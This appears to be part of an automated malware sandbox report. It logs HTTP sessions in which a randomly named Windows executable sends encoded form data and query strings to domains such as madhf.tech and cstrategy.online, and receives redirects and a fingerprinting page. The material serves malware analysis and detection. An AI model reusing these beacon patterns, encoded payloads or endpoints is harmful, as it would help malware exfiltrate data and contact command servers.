                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.449802194.76.119.60803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:12:25.827003956 CET359OUTGET /qx5d/?Mr60=IyUQrkKyuirfHSYuUsN1+y7QK+I5LuF7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPvprNVphaqp6upu86OQyU68aVNw4H3NL9j/8=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.cstrategy.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:12:27.183223009 CET531INHTTP/1.1 301 Moved Permanently
                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:26 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 178
                                                                                                                          Connection: close
                                                                                                                          Location: https://www.cstrategy.online/qx5d/?Mr60=IyUQrkKyuirfHSYuUsN1+y7QK+I5LuF7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPvprNVphaqp6upu86OQyU68aVNw4H3NL9j/8=&o6=SpTPojpx7H
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.449823103.224.182.242803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:12:33.679647923 CET615OUTPOST /6ou6/ HTTP/1.1
                                                                                                                          Host: www.madhf.tech
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.madhf.tech
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.madhf.tech/6ou6/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4d 79 41 43 68 48 6f 43 65 74 65 32 61 66 4b 56 76 2f 48 4a 42 49 4b 31 37 34 31 67 65 67 4c 48 2f 6f 76 38 79 71 39 2f 49 67 50 45 58 32 32 33 4e 53 30 34 50 58 50 54 4b 36 34 65 30 46 71 2f 36 78 55 78 57 64 54 42 39 57 37 6a 2f 4e 46 6c 32 4d 68 64 35 49 70 68 50 45 62 37 51 37 36 2f 4b 73 73 6b 45 57 41 4b 55 4f 78 4a 4c 50 64 67 75 67 44 77 74 44 4e 62 53 6e 71 43 6d 31 65 36 43 39 39 4a 66 78 6d 75 45 4c 4c 6d 5a 6f 79 4e 6e 64 67 46 53 41 78 2b 38 52 65 73 63 45 4e 6f 70 31 78 56 50 46 47 49 45 42 5a 41 4c 49 64 6e 38 76 51 58 2b 41 3d 3d
                                                                                                                          Data Ascii: Mr60=bcTWnB08V6+cMyAChHoCete2afKVv/HJBIK1741gegLH/ov8yq9/IgPEX223NS04PXPTK64e0Fq/6xUxWdTB9W7j/NFl2Mhd5IphPEb7Q76/KsskEWAKUOxJLPdgugDwtDNbSnqCm1e6C99JfxmuELLmZoyNndgFSAx+8RescENop1xVPFGIEBZALIdn8vQX+A==
                                                                                                                          Nov 22, 2024 15:12:34.959163904 CET871INHTTP/1.1 200 OK
                                                                                                                          date: Fri, 22 Nov 2024 14:12:34 GMT
                                                                                                                          server: Apache
                                                                                                                          set-cookie: __tad=1732284754.2783085; expires=Mon, 20-Nov-2034 14:12:34 GMT; Max-Age=315360000
                                                                                                                          vary: Accept-Encoding
                                                                                                                          content-encoding: gzip
                                                                                                                          content-length: 576
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          connection: close
                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                                                                                          Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.449829103.224.182.242803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:12:36.347232103 CET635OUTPOST /6ou6/ HTTP/1.1
                                                                                                                          Host: www.madhf.tech
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.madhf.tech
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.madhf.tech/6ou6/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4f 57 45 43 74 41 38 43 57 74 65 78 5a 66 4b 56 6b 66 48 56 42 4a 32 31 37 35 77 37 65 56 6a 48 36 36 33 38 31 75 4a 2f 4e 67 50 45 63 57 32 49 44 79 30 76 50 58 44 78 4b 35 67 65 30 45 4b 2f 36 7a 4d 78 52 75 72 43 39 47 37 68 33 74 46 6a 37 73 68 64 35 49 70 68 50 41 7a 52 51 37 69 2f 4c 66 6b 6b 4c 53 55 4c 4c 2b 78 49 49 50 64 67 6c 41 44 30 74 44 4d 32 53 69 7a 66 6d 33 57 36 43 34 52 4a 66 6a 43 74 4f 4c 4c 6b 47 59 7a 6a 76 74 4a 70 55 79 67 2f 69 52 4f 77 66 32 4d 50 6f 7a 38 50 65 30 6e 66 57 42 39 7a 57 50 55 54 78 73 74 65 6c 47 62 47 56 4d 71 45 50 65 67 44 41 5a 59 69 39 57 75 6f 46 69 38 3d
                                                                                                                          Data Ascii: Mr60=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eVjH66381uJ/NgPEcW2IDy0vPXDxK5ge0EK/6zMxRurC9G7h3tFj7shd5IphPAzRQ7i/LfkkLSULL+xIIPdglAD0tDM2Sizfm3W6C4RJfjCtOLLkGYzjvtJpUyg/iROwf2MPoz8Pe0nfWB9zWPUTxstelGbGVMqEPegDAZYi9WuoFi8=
                                                                                                                          Nov 22, 2024 15:12:37.663254976 CET871INHTTP/1.1 200 OK
                                                                                                                          date: Fri, 22 Nov 2024 14:12:37 GMT
                                                                                                                          server: Apache
                                                                                                                          set-cookie: __tad=1732284757.5675792; expires=Mon, 20-Nov-2034 14:12:37 GMT; Max-Age=315360000
                                                                                                                          vary: Accept-Encoding
                                                                                                                          content-encoding: gzip
                                                                                                                          content-length: 576
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          connection: close
                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                                                                                          Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.449835103.224.182.242803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:12:39.003422976 CET10717OUTPOST /6ou6/ HTTP/1.1
                                                                                                                          Host: www.madhf.tech
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.madhf.tech
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.madhf.tech/6ou6/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4f 57 45 43 74 41 38 43 57 74 65 78 5a 66 4b 56 6b 66 48 56 42 4a 32 31 37 35 77 37 65 54 37 48 6d 66 72 38 7a 4a 56 2f 4b 67 50 45 41 6d 32 7a 44 79 30 79 50 58 4c 31 4b 35 74 70 30 41 36 2f 37 53 73 78 51 66 72 43 75 6d 37 68 6f 64 46 69 32 4d 68 45 35 4c 52 74 50 45 76 52 51 37 69 2f 4c 5a 41 6b 50 47 41 4c 51 2b 78 4a 4c 50 63 68 75 67 44 49 74 41 38 49 53 6a 48 50 6d 45 4f 36 44 59 42 4a 61 52 61 74 4e 72 4c 69 48 59 7a 4e 76 74 56 32 55 79 73 4a 69 53 53 4b 66 30 51 50 6f 31 34 57 61 77 33 72 4e 67 34 72 46 49 31 32 30 38 4a 4d 6d 47 33 6b 52 65 2f 5a 5a 76 6f 50 50 49 78 58 6d 32 79 76 65 43 43 6f 47 69 64 79 2b 35 36 45 4d 39 30 44 4e 47 47 53 73 35 6d 31 6b 44 45 56 6e 59 48 39 31 58 71 53 4b 54 77 36 63 4f 47 45 75 35 4e 4f 36 46 4d 31 49 34 58 32 66 4d 74 4c 66 6a 61 77 73 6d 62 43 55 7a 33 71 61 6c 5a 5a 78 48 4a 46 66 46 4c 38 71 48 7a 6a 46 78 33 45 55 6f 53 44 70 6a 49 33 2b 42 71 42 38 6f 35 6e 47 49 4b 78 33 6f 55 6c 37 46 2f 52 42 [TRUNCATED]
                                                                                                                          Data Ascii: Mr60=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eT7Hmfr8zJV/KgPEAm2zDy0yPXL1K5tp0A6/7SsxQfrCum7hodFi2MhE5LRtPEvRQ7i/LZAkPGALQ+xJLPchugDItA8ISjHPmEO6DYBJaRatNrLiHYzNvtV2UysJiSSKf0QPo14Waw3rNg4rFI1208JMmG3kRe/ZZvoPPIxXm2yveCCoGidy+56EM90DNGGSs5m1kDEVnYH91XqSKTw6cOGEu5NO6FM1I4X2fMtLfjawsmbCUz3qalZZxHJFfFL8qHzjFx3EUoSDpjI3+BqB8o5nGIKx3oUl7F/RB8Rsgo6xwLomS0Gjo+zH2iHWsS2iGAaIGlncIOugwN64HbnTYyp72sKG1JRClDFqSf+MeP5Vz5pu6Ic2bLrjNgFKVm4yTMqchHrBACrbh5vClPIMfQQzdprLGydDSfefhR1mQLB0rnmCyeJpfT2h3AEDUDmu5aETKmQ5HA1xNMUDAUvh1+FV9WRHzTfxC/negzWYFWpV2cOOViL1jWIu5CxJovxp/YR3Xwe/YXtQgC35xPFtldZhdseBSMfERQMTe7rCMZSJ6e6QbqnnGRBIV5HZnxQrweeWfLM2sz0786sDOfPQCR5IEev5Za8RsvcPtDpI2vaTFnyAVAskINtkPdDDqm2+JOKVybzZU7qUFiJWH+XPKqdigakDrD82KrOuTJzOCJJCidy6HqUUpgbrfyNAsMdJv7mJXqBnsxDloM+uK5Z5KGTulc+4Aj5LY2jIzPmWTIFTMpSyt1UyFecaeL+nvzkgdpUWqt9y7SP/5LA5FpG5CmEd/RTIfqawwPyIWt9uIyQkBD+55U8tQM3Rt7LYhZ5cMghMW+fvU+dc7Jk2SklWY4s07iMj2szFG6Httwlxo4qWsSOaN9tnGJ7Tz2ksFI9e9bnxaWxI9DvvYANqqIkh4dOalQX718ppEGzDtmUCj0LIRqoF+CO/gbVXeShG33uW82EaRTm [TRUNCATED]
                                                                                                                          Nov 22, 2024 15:12:40.360388041 CET871INHTTP/1.1 200 OK
                                                                                                                          date: Fri, 22 Nov 2024 14:12:40 GMT
                                                                                                                          server: Apache
                                                                                                                          set-cookie: __tad=1732284760.2043783; expires=Mon, 20-Nov-2034 14:12:40 GMT; Max-Age=315360000
                                                                                                                          vary: Accept-Encoding
                                                                                                                          content-encoding: gzip
                                                                                                                          content-length: 576
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          connection: close
                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                                                                                          Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.449841103.224.182.242803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:12:41.652867079 CET353OUTGET /6ou6/?o6=SpTPojpx7H&Mr60=We72k2U8RqyHNx9ftVgFe72GQMu4iuXnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5WHt4/FI7OJ+yOIhAl7/LaOCHNokGW9xZfY= HTTP/1.1
                                                                                                                          Host: www.madhf.tech
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:12:42.993855953 CET1236INHTTP/1.1 200 OK
                                                                                                                          date: Fri, 22 Nov 2024 14:12:42 GMT
                                                                                                                          server: Apache
                                                                                                                          set-cookie: __tad=1732284762.3968677; expires=Mon, 20-Nov-2034 14:12:42 GMT; Max-Age=315360000
                                                                                                                          vary: Accept-Encoding
                                                                                                                          content-length: 1472
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 36 6f 75 36 2f 3f 6f 36 3d 53 70 54 50 6f 6a 70 78 37 48 26 4d 72 36 30 3d 57 65 37 32 6b 32 55 38 52 71 79 48 4e 78 39 66 74 56 67 46 65 37 32 47 51 4d 75 34 69 75 58 6e 43 61 75 30 35 4b 51 4d 55 6a 57 6d 71 37 33 49 7a 75 70 46 64 52 47 64 64 6e 6d 58 43 53 52 64 4d 55 72 6b 47 4b 64 51 30 41 48 59 38 6a 42 49 55 63 2f 74 35 57 48 74 34 2f 46 49 37 4f 4a 2b 79 4f 49 68 41 6c 37 2f 4c 61 4f 43 48 4e 6f 6b 47 57 39 78 5a 66 59 3d 26 27 3b [TRUNCATED]
                                                                                                                          Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/6ou6/?o6=SpTPojpx7H&Mr60=We72k2U8RqyHNx9ftVgFe72GQMu4iuXnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5WHt4/FI7OJ+yOIhAl7/LaOCHNokGW9xZfY=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text=
                                                                                                                          Nov 22, 2024 15:12:42.993959904 CET508INData Raw: 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 36 6f 75 36 2f 3f 6f 36 3d 53 70 54
                                                                                                                          Data Ascii: "#000000"><div style='display: none;'><a href='http://www.madhf.tech/6ou6/?o6=SpTPojpx7H&Mr60=We72k2U8RqyHNx9ftVgFe72GQMu4iuXnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5WHt4/FI7OJ+yOIhAl7/LaOCHNokGW9xZfY=&fp=-3'>Click here to enter<


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.449857104.21.58.90803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:12:48.458190918 CET627OUTPOST /v89f/ HTTP/1.1
                                                                                                                          Host: www.bser101pp.buzz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.bser101pp.buzz
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.bser101pp.buzz/v89f/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 51 61 45 52 37 58 6a 38 69 33 31 67 51 44 61 6a 45 7a 6b 68 38 53 48 68 59 45 59 68 2f 63 66 51 33 41 77 37 34 34 78 48 36 6a 65 7a 67 37 43 63 75 77 30 32 71 52 34 67 54 33 52 4e 6d 57 55 73 57 37 51 55 78 31 5a 45 32 59 6f 35 68 68 33 47 54 33 54 75 55 58 36 67 47 35 66 45 39 71 6d 59 48 7a 74 45 34 56 2b 64 48 34 6f 66 5a 71 69 5a 67 36 6e 7a 6f 44 2f 75 43 71 7a 4f 50 36 51 37 62 42 46 64 75 6b 68 55 4b 2b 64 57 4c 78 56 32 39 58 50 70 30 33 4a 64 76 2f 76 38 74 44 6d 6f 64 62 53 4a 57 52 43 55 49 36 38 47 4a 70 36 45 4d 6c 56 39 35 41 3d 3d
                                                                                                                          Data Ascii: Mr60=iTfEV/Gi0JnQQaER7Xj8i31gQDajEzkh8SHhYEYh/cfQ3Aw744xH6jezg7Ccuw02qR4gT3RNmWUsW7QUx1ZE2Yo5hh3GT3TuUX6gG5fE9qmYHztE4V+dH4ofZqiZg6nzoD/uCqzOP6Q7bBFdukhUK+dWLxV29XPp03Jdv/v8tDmodbSJWRCUI68GJp6EMlV95A==
                                                                                                                          Nov 22, 2024 15:12:49.732104063 CET961INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:49 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ExXGxVIp2ZMU2E%2FTyHRW1RD9gnnczn%2BJqS7%2BunlbQOoFvujy1wGLzJjTT9zGMOcQV%2FV4E%2B6rGYhjLxAtn%2F6xAuJ0%2BaS2XwgMetJW7HB1sj%2BNe3OD8ig3PX0lI%2BWjaofse6bE9n4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e6984411928159b-EWR
                                                                                                                          Content-Encoding: gzip
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1703&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=627&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
